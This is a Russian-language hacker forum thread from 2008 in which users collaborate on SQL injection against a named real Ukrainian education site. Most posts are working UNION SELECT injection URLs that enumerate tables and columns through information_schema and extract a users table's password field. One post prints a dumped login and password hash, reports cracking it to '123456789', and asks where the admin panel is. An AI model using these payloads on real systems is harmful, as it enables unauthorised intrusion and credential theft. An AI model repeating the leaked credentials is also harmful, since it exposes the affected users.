28.05.2008, 23:43
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами:
9650515
Репутация:
5
|
|
А ещё,
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ NAME,0x71),0x71)+from+information_schema.columns+w here+table_name=chr(39).chr(117).chr(115).chr(101) .chr(114).chr(115).chr(39)+limit+0,1/*
Так это делается? char='users'
|
|
|
28.05.2008, 23:47
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ name,0x71),0x71)+from+information_schema.columns+w here+table_name=0x и hex_ТАБЛИЦЫ/*
например, колонки с таблицы USERS:
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ name,0x71),0x71)+from+information_schema.columns+w here+table_name=0x7573657273+limit+2,1/*
Последний раз редактировалось sabe; 29.05.2008 в 00:07..
|
|
|
|
29.05.2008, 00:07
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами:
9650515
Репутация:
5
|
|
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,user+from+users/*
блин, а чё тогда не выходит???
|
|
|
|
29.05.2008, 00:17
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Не из той базы просишь
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
29.05.2008, 00:18
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
все просто..)
достаем table_schema
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(table_s chema,0x71),0x71)+from+Information_schema.tables+w here+table_name=0x7573657273/*
достаем пасс:
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(pass,0x 71),0x71)+from+test_190.users/*
ну в итоге получил пасс и логин чела. чей id=3. т.к. 1,2 нету.)
anna1;25f9e794323b453885f5181f1b624d0b
расшивровуем хеш и получаем пасс: 123456789
но токо вот где вход?)
Последний раз редактировалось sabe; 29.05.2008 в 00:32..
|
|
|
|
29.05.2008, 00:23
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
На100ящий
table_schema+from+information_schema.tables+where+ table_name=... табличка
советую почитать https://forum.antichat.ru/showpost.php?p=401199&postcount=17
Сообщение от sabe
достаем table_schema из таблицы USERS
Жжошь чтоле? =\
и кстате наверняка гет =(
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 29.05.2008 в 00:26..
|
|
|
|
29.05.2008, 00:18
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами:
9650515
Репутация:
5
|
|
А как в найти имена баз???
|
|
|
|
29.05.2008, 00:19
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(table_s chema,0x71),0x71)+from+Information_schema.tables+w here+table_name=0x7573657273/*
обновляю пост) по чуть чуть)
Последний раз редактировалось sabe; 29.05.2008 в 01:06..
|
|
|
|
29.05.2008, 00:24
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами:
9650515
Репутация:
5
|
|
Sabe, а ты случайно админку не нашёл???))))
|
|
|
|
29.05.2008, 00:29
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Constantine
обновил пост. пасс получил этим способом)
пс: немножко подкурил..)
На100ящий
это я у тебя спрашиваю..) смысл взлома?)
Последний раз редактировалось sabe; 07.06.2008 в 22:09..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
